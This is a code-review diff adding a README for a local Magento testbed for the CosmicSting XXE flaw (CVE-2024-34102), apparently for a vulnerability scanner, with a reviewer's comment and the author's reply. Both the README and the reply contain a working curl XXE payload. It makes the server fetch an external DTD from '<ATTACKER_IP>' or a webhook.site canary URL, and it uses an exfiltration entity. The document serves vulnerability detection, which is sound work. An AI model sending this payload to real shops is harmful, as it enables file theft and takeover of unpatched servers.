magento/CVE-2024-34102_CosmicSting/README.md

```diff
@@ -0,0 +1,65 @@
+# Magento / Adobe Commerce CosmicSting XXE (CVE-2024-34102)
+
+## Description
+Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that can lead to arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) can accomplished by combining this issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1).
+
+## Launch Testbed
+
+### Vulnerable version
+Launch vulnerable version: Magento v2.4.7-p0.
+```sh
+docker compose -f docker-compose-vuln.yml up
+```
+
+### Safe version
+Launch safe version: Magento v2.4.7-p2.
+```sh
+docker compose -f docker-compose-safe.yml up
+```
+
+## Vulnerability Test
+You can use the following command to check whether the instance is vulnerable or not (credits to vicarius.io):
+```sh
+curl -k -X POST \
+  http://127.0.0.1:8080/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \
+  -H "Content-Type: application/json" \
+  -d '{
+    "address": {
+      "totalsReader": {
+        "collectorList": {
+          "totalCollector": {
+            "sourceData": {
+              "data": "<?xml version=\"1.0\" ?><!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://<ATTACKER_IP>/dtd.xml\"> %sp; %param1; ]><r>&exfil;</r>",
+              "options": 16
+            }
+          }
+        }
+      }
+    }
+  }'
+```
+
+A vulnerable instance will reply with the following message:
+```json
+{"message":"Internal Error. Details are available in Magento log file. Report ID: webapi-66d8a8d363765"}
+```
+while a safe instance will output the following:
+```json
+{"message":"Invalid data type"}
+```
+Moreover, you can replace `<ATTACKER_IP>` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will.
```

Comment:
I tried with https://webhook.site/ and tsunami callback server, but it didn't register a callback. I wonder if there's there's some formatting issue. Running the plugin with callback server did work, so I think the general payload is working.

Reply:
Hey Annie, I just realized the text is inaccurate, as you would have to replace the whole URL with a canary URL and not just the `<ATTACKER_IP>` portion, maybe that's the issue. I'll fix the text.

I tried with the following command and I got a callback:
```sh
curl -k -X POST \
  http://127.0.0.1:8080/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \
  -H "Content-Type: application/json" \
  -d '{
    "address": {
      "totalsReader": {
        "collectorList": {
          "totalCollector": {
            "sourceData": {
              "data": "<?xml version=\"1.0\" ?><!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://webhook.site/16b6800a-57b8-4e52-8c9f-69d2754b1fa4\"> %sp; %param1; ]><r>&exfil;</r>",
              "options": 16
            }
          }
        }
      }
    }
  }'
```